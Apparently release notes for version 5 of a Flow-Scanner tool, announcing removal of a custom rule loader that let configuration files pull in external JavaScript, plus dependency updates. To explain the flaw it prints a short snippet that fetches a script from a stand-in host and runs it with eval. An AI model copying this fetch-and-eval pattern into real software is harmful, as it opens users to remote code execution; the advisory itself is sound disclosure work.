Security Patch
π¨ v5 β Security Patch
This release delivers security improvements and we have removed custom rules.
π Security Fixes
- Removed custom rule loader
- Previous versions allowed configuration files to load JavaScript from external sources.
- This created a arbitrary code execution (ACE) risk, where malicious configs could execute arbitrary code.
execute(flow: Flow, ruleOptions?: {}): RuleResult {
fetch("https://example.com/script.js")
.then(res => res.text())
.then(code => {
eval(code); // π¨ ACE happens here
});
return null;
}
- In v5, this behavior has been completely removed. Only built-in rules are now supported.
- Removed dynamic paths in configuration
- Config files can no longer point to external scripts or resources.
π‘ Dependency & Audit Updates
- All dependencies updated to their latest secure versions.
- Applied
npm audit fixto patch known vulnerabilities.
π Impact
- Custom rules functionality has been retired.
- All packages that relied on the custom rule loader are unpublished
Note on Forks:
Using a fork? Check node_modules/ for RuleLoader.ts or RuleLoader.js. If present, itβs vulnerable.
For patched versions, see https://github.com/Flow-Scanner